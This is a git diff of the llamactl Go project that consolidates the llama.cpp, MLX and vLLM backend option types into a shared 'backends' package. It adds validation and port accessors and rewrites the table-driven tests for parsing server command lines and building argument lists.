t.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
}
},
},
{
name: "mixed flag formats",
command: "llama-server --model=/path/model.gguf --gpu-layers 16 --verbose",
expectErr: false,
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
if opts.Model != "/path/model.gguf" {
t.Errorf("expected model '/path/model.gguf', got '%s'", opts.Model)
}
if opts.GPULayers != 16 {
t.Errorf("expected gpu_layers 16, got %d", opts.GPULayers)
}
if !opts.Verbose {
t.Errorf("expected verbose to be true")
}
},
},
{
name: "quoted strings",
command: `llama-server --model test.gguf --api-key "sk-1234567890abcdef"`,
expectErr: false,
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
if opts.APIKey != "sk-1234567890abcdef" {
t.Errorf("expected api_key 'sk-1234567890abcdef', got '%s'", opts.APIKey)
}
},
},
{
name: "multiple value types",
command: "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap",
expectErr: false,
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
if opts.Model != "/test/model.gguf" {
t.Errorf("expected model '/test/model.gguf', got '%s'", opts.Model)
}
if opts.GPULayers != 32 {
t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
}
if opts.Temperature != 0.7 {
t.Errorf("expected temperature 0.7, got %f", opts.Temperature)
}
if !opts.Verbose {
t.Errorf("expected verbose to be true")
}
if !opts.NoMmap {
t.Errorf("expected no_mmap to be true")
}
},
},
{
name: "empty command",
@@ -423,7 +385,9 @@ func TestParseLlamaCommand(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := llamacpp.ParseLlamaCommand(tt.command)
var opts backends.LlamaServerOptions
resultAny, err := opts.ParseCommand(tt.command)
result, _ := resultAny.(*backends.LlamaServerOptions)
if tt.expectErr {
if err == nil {
@@ -439,43 +403,21 @@ func TestParseLlamaCommand(t *testing.T) {
if result == nil {
t.Errorf("expected result but got nil")
return
}
if tt.validate != nil {
tt.validate(t, result)
}
})
}
}
func TestParseLlamaCommandValues(t *testing.T) {
command := "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap"
result, err := llamacpp.ParseLlamaCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "/test/model.gguf" {
t.Errorf("expected model '/test/model.gguf', got '%s'", result.Model)
}
if result.GPULayers != 32 {
t.Errorf("expected gpu_layers 32, got %d", result.GPULayers)
}
if result.Temperature != 0.7 {
t.Errorf("expected temperature 0.7, got %f", result.Temperature)
}
if !result.Verbose {
t.Errorf("expected verbose to be true")
}
if !result.NoMmap {
t.Errorf("expected no_mmap to be true")
}
}
func TestParseLlamaCommandArrays(t *testing.T) {
command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin"
result, err := llamacpp.ParseLlamaCommand(command)
var opts backends.LlamaServerOptions
resultAny, err := opts.ParseCommand(command)
result, _ := resultAny.(*backends.LlamaServerOptions)
if err != nil {
t.Fatalf("unexpected error: %v", err)
@@ -492,20 +434,3 @@ func TestParseLlamaCommandArrays(t *testing.T) {
}
}
}
// Helper functions
func contains(slice []string, item string) bool {
return slices.Contains(slice, item)
}
func containsFlagWithValue(args []string, flag, value string) bool {
for i, arg := range args {
if arg == flag {
// Check if there's a next argument and it matches the expected value
if i+1 < len(args) && args[i+1] == value {
return true
}
}
}
return false
}

View File

@@ -1,7 +1,8 @@
package mlx
package backends
import (
"llamactl/pkg/backends"
"fmt"
"llamactl/pkg/validation"
)
type MlxServerOptions struct {
@@ -30,25 +31,58 @@ type MlxServerOptions struct {
MaxTokens int `json:"max_tokens,omitempty"`
}
// BuildCommandArgs converts to command line arguments
func (o *MlxServerOptions) BuildCommandArgs() []string {
multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields
return backends.BuildCommandArgs(o, multipleFlags)
func (o *MlxServerOptions) GetPort() int {
return o.Port
}
// ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions
func (o *MlxServerOptions) SetPort(port int) {
o.Port = port
}
func (o *MlxServerOptions) GetHost() string {
return o.Host
}
func (o *MlxServerOptions) Validate() error {
if o == nil {
return validation.ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
}
if err := validation.ValidateStructStrings(o, ""); err != nil {
return err
}
// Basic network validation for port
if o.Port < 0 || o.Port > 65535 {
return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
}
return nil
}
// BuildCommandArgs converts to command line arguments
func (o *MlxServerOptions) BuildCommandArgs() []string {
multipleFlags := map[string]struct{}{} // MLX doesn't currently have []string fields
return BuildCommandArgs(o, multipleFlags)
}
func (o *MlxServerOptions) BuildDockerArgs() []string {
return []string{}
}
// ParseCommand parses a mlx_lm.server command string into MlxServerOptions
// Supports multiple formats:
// 1. Full command: "mlx_lm.server --model model/path"
// 2. Full path: "/usr/local/bin/mlx_lm.server --model model/path"
// 3. Args only: "--model model/path --host 0.0.0.0"
// 4. Multiline commands with backslashes
func ParseMlxCommand(command string) (*MlxServerOptions, error) {
func (o *MlxServerOptions) ParseCommand(command string) (any, error) {
executableNames := []string{"mlx_lm.server"}
var subcommandNames []string // MLX has no subcommands
multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags
var subcommandNames []string // MLX has no subcommands
multiValuedFlags := map[string]struct{}{} // MLX has no multi-valued flags
var mlxOptions MlxServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
if err := parseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
return nil, err
}

View File

@@ -1,157 +0,0 @@
package mlx_test
import (
"llamactl/pkg/backends/mlx"
"testing"
)
func TestParseMlxCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic command",
command: "mlx_lm.server --model /path/to/model --host 0.0.0.0",
expectErr: false,
},
{
name: "args only",
command: "--model /path/to/model --port 8080",
expectErr: false,
},
{
name: "mixed flag formats",
command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
expectErr: false,
},
{
name: "quoted strings",
command: `mlx_lm.server --model test.mlx --chat-template "User: {user}\nAssistant: "`,
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `mlx_lm.server --model test.mlx --chat-template "unterminated`,
expectErr: true,
},
{
name: "malformed flag",
command: "mlx_lm.server ---model test.mlx",
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := mlx.ParseMlxCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseMlxCommandValues(t *testing.T) {
command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG"
result, err := mlx.ParseMlxCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "/test/model.mlx" {
t.Errorf("expected model '/test/model.mlx', got '%s'", result.Model)
}
if result.Port != 8080 {
t.Errorf("expected port 8080, got %d", result.Port)
}
if result.Temp != 0.7 {
t.Errorf("expected temp 0.7, got %f", result.Temp)
}
if !result.TrustRemoteCode {
t.Errorf("expected trust_remote_code to be true")
}
if result.LogLevel != "DEBUG" {
t.Errorf("expected log_level 'DEBUG', got '%s'", result.LogLevel)
}
}
func TestBuildCommandArgs(t *testing.T) {
options := &mlx.MlxServerOptions{
Model: "/test/model.mlx",
Host: "127.0.0.1",
Port: 8080,
Temp: 0.7,
TopP: 0.9,
TopK: 40,
MaxTokens: 2048,
TrustRemoteCode: true,
LogLevel: "DEBUG",
ChatTemplate: "custom template",
}
args := options.BuildCommandArgs()
// Check that all expected flags are present
expectedFlags := map[string]string{
"--model": "/test/model.mlx",
"--host": "127.0.0.1",
"--port": "8080",
"--log-level": "DEBUG",
"--chat-template": "custom template",
"--temp": "0.7",
"--top-p": "0.9",
"--top-k": "40",
"--max-tokens": "2048",
}
for i := 0; i < len(args); i++ {
if args[i] == "--trust-remote-code" {
continue // Boolean flag with no value
}
if args[i] == "--use-default-chat-template" {
continue // Boolean flag with no value
}
if expectedValue, exists := expectedFlags[args[i]]; exists && i+1 < len(args) {
if args[i+1] != expectedValue {
t.Errorf("expected %s to have value %s, got %s", args[i], expectedValue, args[i+1])
}
}
}
// Check boolean flags
foundTrustRemoteCode := false
for _, arg := range args {
if arg == "--trust-remote-code" {
foundTrustRemoteCode = true
}
}
if !foundTrustRemoteCode {
t.Errorf("expected --trust-remote-code flag to be present")
}
}

204
pkg/backends/mlx_test.go Normal file
View File

@@ -0,0 +1,204 @@
package backends_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/testutil"
"testing"
)
func TestParseMlxCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
validate func(*testing.T, *backends.MlxServerOptions)
}{
{
name: "basic command",
command: "mlx_lm.server --model /path/to/model --host 0.0.0.0",
expectErr: false,
validate: func(t *testing.T, opts *backends.MlxServerOptions) {
if opts.Model != "/path/to/model" {
t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
}
if opts.Host != "0.0.0.0" {
t.Errorf("expected host '0.0.0.0', got '%s'", opts.Host)
}
},
},
{
name: "args only",
command: "--model /path/to/model --port 8080",
expectErr: false,
validate: func(t *testing.T, opts *backends.MlxServerOptions) {
if opts.Model != "/path/to/model" {
t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("expected port 8080, got %d", opts.Port)
}
},
},
{
name: "mixed flag formats",
command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
expectErr: false,
validate: func(t *testing.T, opts *backends.MlxServerOptions) {
if opts.Model != "/path/model" {
t.Errorf("expected model '/path/model', got '%s'", opts.Model)
}
if opts.Temp != 0.7 {
t.Errorf("expected temp 0.7, got %f", opts.Temp)
}
if !opts.TrustRemoteCode {
t.Errorf("expected trust_remote_code to be true")
}
},
},
{
name: "multiple value types",
command: "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG",
expectErr: false,
validate: func(t *testing.T, opts *backends.MlxServerOptions) {
if opts.Model != "/test/model.mlx" {
t.Errorf("expected model '/test/model.mlx', got '%s'", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("expected port 8080, got %d", opts.Port)
}
if opts.Temp != 0.7 {
t.Errorf("expected temp 0.7, got %f", opts.Temp)
}
if !opts.TrustRemoteCode {
t.Errorf("expected trust_remote_code to be true")
}
if opts.LogLevel != "DEBUG" {
t.Errorf("expected log_level 'DEBUG', got '%s'", opts.LogLevel)
}
},
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `mlx_lm.server --model test.mlx --chat-template "unterminated`,
expectErr: true,
},
{
name: "malformed flag",
command: "mlx_lm.server ---model test.mlx",
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
var opts backends.MlxServerOptions
resultAny, err := opts.ParseCommand(tt.command)
result, _ := resultAny.(*backends.MlxServerOptions)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
return
}
if tt.validate != nil {
tt.validate(t, result)
}
})
}
}
func TestMlxBuildCommandArgs_BooleanFields(t *testing.T) {
tests := []struct {
name string
options backends.MlxServerOptions
expected []string
excluded []string
}{
{
name: "trust_remote_code true",
options: backends.MlxServerOptions{
TrustRemoteCode: true,
},
expected: []string{"--trust-remote-code"},
},
{
name: "trust_remote_code false",
options: backends.MlxServerOptions{
TrustRemoteCode: false,
},
excluded: []string{"--trust-remote-code"},
},
{
name: "multiple booleans",
options: backends.MlxServerOptions{
TrustRemoteCode: true,
UseDefaultChatTemplate: true,
},
expected: []string{"--trust-remote-code", "--use-default-chat-template"},
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
args := tt.options.BuildCommandArgs()
for _, expectedArg := range tt.expected {
if !testutil.Contains(args, expectedArg) {
t.Errorf("Expected argument %q not found in %v", expectedArg, args)
}
}
for _, excludedArg := range tt.excluded {
if testutil.Contains(args, excludedArg) {
t.Errorf("Excluded argument %q found in %v", excludedArg, args)
}
}
})
}
}
func TestMlxBuildCommandArgs_ZeroValues(t *testing.T) {
options := backends.MlxServerOptions{
Port: 0, // Should be excluded
TopK: 0, // Should be excluded
Temp: 0, // Should be excluded
Model: "", // Should be excluded
LogLevel: "", // Should be excluded
TrustRemoteCode: false, // Should be excluded
}
args := options.BuildCommandArgs()
// Zero values should not appear in arguments
excludedArgs := []string{
"--port", "0",
"--top-k", "0",
"--temp", "0",
"--model", "",
"--log-level", "",
"--trust-remote-code",
}
for _, excludedArg := range excludedArgs {
if testutil.Contains(args, excludedArg) {
t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
}
}
}

View File

@@ -9,8 +9,8 @@ import (
"strings"
)
// ParseCommand parses a command string into a target struct
func ParseCommand(command string, executableNames []string, subcommandNames []string, multiValuedFlags map[string]bool, target any) error {
// parseCommand parses a command string into a target struct
func parseCommand(command string, executableNames []string, subcommandNames []string, multiValuedFlags map[string]struct{}, target any) error {
// Normalize multiline commands
command = normalizeCommand(command)
if command == "" {
@@ -125,7 +125,7 @@ func extractArgs(command string, executableNames []string, subcommandNames []str
}
// parseFlags parses command line flags into a map
func parseFlags(args []string, multiValuedFlags map[string]bool) (map[string]any, error) {
func parseFlags(args []string, multiValuedFlags map[string]struct{}) (map[string]any, error) {
options := make(map[string]any)
for i := 0; i < len(args); i++ {
@@ -163,7 +163,7 @@ func parseFlags(args []string, multiValuedFlags map[string]bool) (map[string]any
if hasValue {
// Handle multi-valued flags
if multiValuedFlags[flagName] {
if _, isMultiValue := multiValuedFlags[flagName]; isMultiValue {
if existing, ok := options[flagName].([]string); ok {
options[flagName] = append(existing, value)
} else {

View File

@@ -1,16 +1,21 @@
package vllm
package backends
import (
"llamactl/pkg/backends"
"fmt"
"llamactl/pkg/validation"
)
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
var multiValuedFlags = map[string]bool{
"api-key": true,
"allowed-origins": true,
"allowed-methods": true,
"allowed-headers": true,
"middleware": true,
// vllmMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
// Based on vLLM's CLI argument definitions with action='append' or List types
// Keys use snake_case as the parser converts kebab-case flags to snake_case before lookup
var vllmMultiValuedFlags = map[string]struct{}{
"api_key": {}, // --api-key (action='append')
"allowed_origins": {}, // --allowed-origins (List type)
"allowed_methods": {}, // --allowed-methods (List type)
"allowed_headers": {}, // --allowed-headers (List type)
"middleware": {}, // --middleware (action='append')
"lora_modules": {}, // --lora-modules (custom LoRAParserAction, accepts multiple)
"prompt_adapters": {}, // --prompt-adapters (similar to lora-modules, accepts multiple)
}
type VllmServerOptions struct {
@@ -139,6 +144,36 @@ type VllmServerOptions struct {
OverrideKVCacheALIGNSize int `json:"override_kv_cache_align_size,omitempty"`
}
func (o *VllmServerOptions) GetPort() int {
return o.Port
}
func (o *VllmServerOptions) SetPort(port int) {
o.Port = port
}
func (o *VllmServerOptions) GetHost() string {
return o.Host
}
func (o *VllmServerOptions) Validate() error {
if o == nil {
return validation.ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validation.ValidateStructStrings(o, ""); err != nil {
return err
}
// Basic network validation for port
if o.Port < 0 || o.Port > 65535 {
return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
}
return nil
}
// BuildCommandArgs converts VllmServerOptions to command line arguments
// For vLLM native, model is a positional argument after "serve"
func (o *VllmServerOptions) BuildCommandArgs() []string {
@@ -155,7 +190,7 @@ func (o *VllmServerOptions) BuildCommandArgs() []string {
// Use package-level multipleFlags variable
flagArgs := backends.BuildCommandArgs(&optionsCopy, multiValuedFlags)
flagArgs := BuildCommandArgs(&optionsCopy, vllmMultiValuedFlags)
args = append(args, flagArgs...)
return args
@@ -165,34 +200,25 @@ func (o *VllmServerOptions) BuildDockerArgs() []string {
var args []string
// Use package-level multipleFlags variable
flagArgs := backends.BuildCommandArgs(o, multiValuedFlags)
flagArgs := BuildCommandArgs(o, vllmMultiValuedFlags)
args = append(args, flagArgs...)
return args
}
// ParseVllmCommand parses a vLLM serve command string into VllmServerOptions
// ParseCommand parses a vLLM serve command string into VllmServerOptions
// Supports multiple formats:
// 1. Full command: "vllm serve --model MODEL_NAME --other-args"
// 2. Full path: "/usr/local/bin/vllm serve --model MODEL_NAME"
// 3. Serve only: "serve --model MODEL_NAME --other-args"
// 4. Args only: "--model MODEL_NAME --other-args"
// 5. Multiline commands with backslashes
func ParseVllmCommand(command string) (*VllmServerOptions, error) {
func (o *VllmServerOptions) ParseCommand(command string) (any, error) {
executableNames := []string{"vllm"}
subcommandNames := []string{"serve"}
multiValuedFlags := map[string]bool{
"middleware": true,
"api_key": true,
"allowed_origins": true,
"allowed_methods": true,
"allowed_headers": true,
"lora_modules": true,
"prompt_adapters": true,
}
var vllmOptions VllmServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
if err := parseCommand(command, executableNames, subcommandNames, vllmMultiValuedFlags, &vllmOptions); err != nil {
return nil, err
}

View File

@@ -1,153 +0,0 @@
package vllm_test
import (
"llamactl/pkg/backends/vllm"
"slices"
"testing"
)
func TestParseVllmCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic vllm serve command",
command: "vllm serve microsoft/DialoGPT-medium",
expectErr: false,
},
{
name: "serve only command",
command: "serve microsoft/DialoGPT-medium",
expectErr: false,
},
{
name: "positional model with flags",
command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
expectErr: false,
},
{
name: "model with path",
command: "vllm serve /path/to/model --gpu-memory-utilization 0.8",
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `vllm serve "unterminated`,
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := vllm.ParseVllmCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseVllmCommandValues(t *testing.T) {
command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs"
result, err := vllm.ParseVllmCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "test-model" {
t.Errorf("expected model 'test-model', got '%s'", result.Model)
}
if result.TensorParallelSize != 4 {
t.Errorf("expected tensor_parallel_size 4, got %d", result.TensorParallelSize)
}
if result.GPUMemoryUtilization != 0.8 {
t.Errorf("expected gpu_memory_utilization 0.8, got %f", result.GPUMemoryUtilization)
}
if !result.EnableLogOutputs {
t.Errorf("expected enable_log_outputs true, got %v", result.EnableLogOutputs)
}
}
func TestBuildCommandArgs(t *testing.T) {
options := vllm.VllmServerOptions{
Model: "microsoft/DialoGPT-medium",
Port: 8080,
Host: "localhost",
TensorParallelSize: 2,
GPUMemoryUtilization: 0.8,
EnableLogOutputs: true,
AllowedOrigins: []string{"http://localhost:3000", "https://example.com"},
}
args := options.BuildCommandArgs()
// Check that model is the first positional argument (not a --model flag)
if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" {
t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args)
}
// Check that --model flag is NOT present (since model should be positional)
if contains(args, "--model") {
t.Errorf("Found --model flag, but model should be positional argument in args: %v", args)
}
// Check other flags
if !containsFlagWithValue(args, "--tensor-parallel-size", "2") {
t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args)
}
if !contains(args, "--enable-log-outputs") {
t.Errorf("Expected --enable-log-outputs not found in %v", args)
}
if !contains(args, "--host") {
t.Errorf("Expected --host not found in %v", args)
}
if !contains(args, "--port") {
t.Errorf("Expected --port not found in %v", args)
}
// Check array handling (multiple flags)
allowedOriginsCount := 0
for i := range args {
if args[i] == "--allowed-origins" {
allowedOriginsCount++
}
}
if allowedOriginsCount != 2 {
t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount)
}
}
// Helper functions
func contains(slice []string, item string) bool {
return slices.Contains(slice, item)
}
func containsFlagWithValue(args []string, flag, value string) bool {
for i, arg := range args {
if arg == flag && i+1 < len(args) && args[i+1] == value {
return true
}
}
return false
}

323
pkg/backends/vllm_test.go Normal file
View File

@@ -0,0 +1,323 @@
package backends_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/testutil"
"testing"
)
func TestParseVllmCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
validate func(*testing.T, *backends.VllmServerOptions)
}{
{
name: "basic vllm serve command",
command: "vllm serve microsoft/DialoGPT-medium",
expectErr: false,
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
if opts.Model != "microsoft/DialoGPT-medium" {
t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
}
},
},
{
name: "serve only command",
command: "serve microsoft/DialoGPT-medium",
expectErr: false,
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
if opts.Model != "microsoft/DialoGPT-medium" {
t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
}
},
},
{
name: "positional model with flags",
command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
expectErr: false,
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
if opts.Model != "microsoft/DialoGPT-medium" {
t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
}
if opts.TensorParallelSize != 2 {
t.Errorf("expected tensor_parallel_size 2, got %d", opts.TensorParallelSize)
}
},
},
{
name: "model with path",
command: "vllm serve /path/to/model --gpu-memory-utilization 0.8",
expectErr: false,
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
if opts.Model != "/path/to/model" {
t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
}
if opts.GPUMemoryUtilization != 0.8 {
t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization)
}
},
},
{
name: "multiple value types",
command: "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs",
expectErr: false,
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
if opts.Model != "test-model" {
t.Errorf("expected model 'test-model', got '%s'", opts.Model)
}
if opts.TensorParallelSize != 4 {
t.Errorf("expected tensor_parallel_size 4, got %d", opts.TensorParallelSize)
}
if opts.GPUMemoryUtilization != 0.8 {
t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization)
}
if !opts.EnableLogOutputs {
t.Errorf("expected enable_log_outputs true, got %v", opts.EnableLogOutputs)
}
},
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `vllm serve "unterminated`,
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
var opts backends.VllmServerOptions
resultAny, err := opts.ParseCommand(tt.command)
result, _ := resultAny.(*backends.VllmServerOptions)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
return
}
if tt.validate != nil {
tt.validate(t, result)
}
})
}
}
func TestParseVllmCommandArrays(t *testing.T) {
command := "vllm serve test-model --middleware auth.py --middleware=cors.py --api-key key1 --api-key key2"
var opts backends.VllmServerOptions
resultAny, err := opts.ParseCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
result, ok := resultAny.(*backends.VllmServerOptions)
if !ok {
t.Fatalf("expected *VllmServerOptions, got %T", resultAny)
}
expectedMiddleware := []string{"auth.py", "cors.py"}
if len(result.Middleware) != len(expectedMiddleware) {
t.Errorf("expected %d middleware items, got %d", len(expectedMiddleware), len(result.Middleware))
}
for i, v := range expectedMiddleware {
if i >= len(result.Middleware) || result.Middleware[i] != v {
t.Errorf("expected middleware[%d]=%s got %s", i, v, result.Middleware[i])
}
}
expectedAPIKeys := []string{"key1", "key2"}
if len(result.APIKey) != len(expectedAPIKeys) {
t.Errorf("expected %d api keys, got %d", len(expectedAPIKeys), len(result.APIKey))
}
for i, v := range expectedAPIKeys {
if i >= len(result.APIKey) || result.APIKey[i] != v {
t.Errorf("expected api_key[%d]=%s got %s", i, v, result.APIKey[i])
}
}
}
func TestVllmBuildCommandArgs_BooleanFields(t *testing.T) {
tests := []struct {
name string
options backends.VllmServerOptions
expected []string
excluded []string
}{
{
name: "enable_log_outputs true",
options: backends.VllmServerOptions{
EnableLogOutputs: true,
},
expected: []string{"--enable-log-outputs"},
},
{
name: "enable_log_outputs false",
options: backends.VllmServerOptions{
EnableLogOutputs: false,
},
excluded: []string{"--enable-log-outputs"},
},
{
name: "multiple booleans",
options: backends.VllmServerOptions{
EnableLogOutputs: true,
TrustRemoteCode: true,
EnablePrefixCaching: true,
DisableLogStats: false,
},
expected: []string{"--enable-log-outputs", "--trust-remote-code", "--enable-prefix-caching"},
excluded: []string{"--disable-log-stats"},
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
args := tt.options.BuildCommandArgs()
for _, expectedArg := range tt.expected {
if !testutil.Contains(args, expectedArg) {
t.Errorf("Expected argument %q not found in %v", expectedArg, args)
}
}
for _, excludedArg := range tt.excluded {
if testutil.Contains(args, excludedArg) {
t.Errorf("Excluded argument %q found in %v", excludedArg, args)
}
}
})
}
}
func TestVllmBuildCommandArgs_ZeroValues(t *testing.T) {
options := backends.VllmServerOptions{
Port: 0, // Should be excluded
TensorParallelSize: 0, // Should be excluded
GPUMemoryUtilization: 0, // Should be excluded
Model: "", // Should be excluded (positional arg)
Host: "", // Should be excluded
EnableLogOutputs: false, // Should be excluded
}
args := options.BuildCommandArgs()
// Zero values should not appear in arguments
excludedArgs := []string{
"--port", "0",
"--tensor-parallel-size", "0",
"--gpu-memory-utilization", "0",
"--host", "",
"--enable-log-outputs",
}
for _, excludedArg := range excludedArgs {
if testutil.Contains(args, excludedArg) {
t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
}
}
// Model should not be present as positional arg when empty
if len(args) > 0 && args[0] == "" {
t.Errorf("Empty model should not be present as positional argument")
}
}
func TestVllmBuildCommandArgs_ArrayFields(t *testing.T) {
options := backends.VllmServerOptions{
AllowedOrigins: []string{"http://localhost:3000", "https://example.com"},
AllowedMethods: []string{"GET", "POST"},
Middleware: []string{"middleware1", "middleware2", "middleware3"},
}
args := options.BuildCommandArgs()
// Check that each array value appears with its flag
expectedOccurrences := map[string][]string{
"--allowed-origins": {"http://localhost:3000", "https://example.com"},
"--allowed-methods": {"GET", "POST"},
"--middleware": {"middleware1", "middleware2", "middleware3"},
}
for flag, values := range expectedOccurrences {
for _, value := range values {
if !testutil.ContainsFlagWithValue(args, flag, value) {
t.Errorf("Expected %s %s, not found in %v", flag, value, args)
}
}
}
}
func TestVllmBuildCommandArgs_EmptyArrays(t *testing.T) {
options := backends.VllmServerOptions{
AllowedOrigins: []string{}, // Empty array should not generate args
Middleware: []string{}, // Empty array should not generate args
}
args := options.BuildCommandArgs()
excludedArgs := []string{"--allowed-origins", "--middleware"}
for _, excludedArg := range excludedArgs {
if testutil.Contains(args, excludedArg) {
t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args)
}
}
}
func TestVllmBuildCommandArgs_PositionalModel(t *testing.T) {
options := backends.VllmServerOptions{
Model: "microsoft/DialoGPT-medium",
Port: 8080,
Host: "localhost",
TensorParallelSize: 2,
GPUMemoryUtilization: 0.8,
EnableLogOutputs: true,
}
args := options.BuildCommandArgs()
// Check that model is the first positional argument (not a --model flag)
if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" {
t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args)
}
// Check that --model flag is NOT present (since model should be positional)
if testutil.Contains(args, "--model") {
t.Errorf("Found --model flag, but model should be positional argument in args: %v", args)
}
// Check other flags
if !testutil.ContainsFlagWithValue(args, "--tensor-parallel-size", "2") {
t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args)
}
if !testutil.ContainsFlagWithValue(args, "--gpu-memory-utilization", "0.8") {
t.Errorf("Expected --gpu-memory-utilization 0.8 not found in %v", args)
}
if !testutil.Contains(args, "--enable-log-outputs") {
t.Errorf("Expected --enable-log-outputs not found in %v", args)
}
if !testutil.ContainsFlagWithValue(args, "--host", "localhost") {
t.Errorf("Expected --host localhost not found in %v", args)
}
if !testutil.ContainsFlagWithValue(args, "--port", "8080") {
t.Errorf("Expected --port 8080 not found in %v", args)
}
}

View File

@@ -1,6 +1,7 @@
package config
import (
"fmt"
"log"
"os"
"path/filepath"
@@ -13,10 +14,11 @@ import (
// BackendSettings contains structured backend configuration
type BackendSettings struct {
Command string `yaml:"command"`
Args []string `yaml:"args"`
Environment map[string]string `yaml:"environment,omitempty"`
Docker *DockerSettings `yaml:"docker,omitempty"`
Command string `yaml:"command"`
Args []string `yaml:"args"`
Environment map[string]string `yaml:"environment,omitempty"`
Docker *DockerSettings `yaml:"docker,omitempty"`
ResponseHeaders map[string]string `yaml:"response_headers,omitempty"`
}
// DockerSettings contains Docker-specific configuration
@@ -36,13 +38,15 @@ type BackendConfig struct {
// AppConfig represents the configuration for llamactl
type AppConfig struct {
Server ServerConfig `yaml:"server"`
Backends BackendConfig `yaml:"backends"`
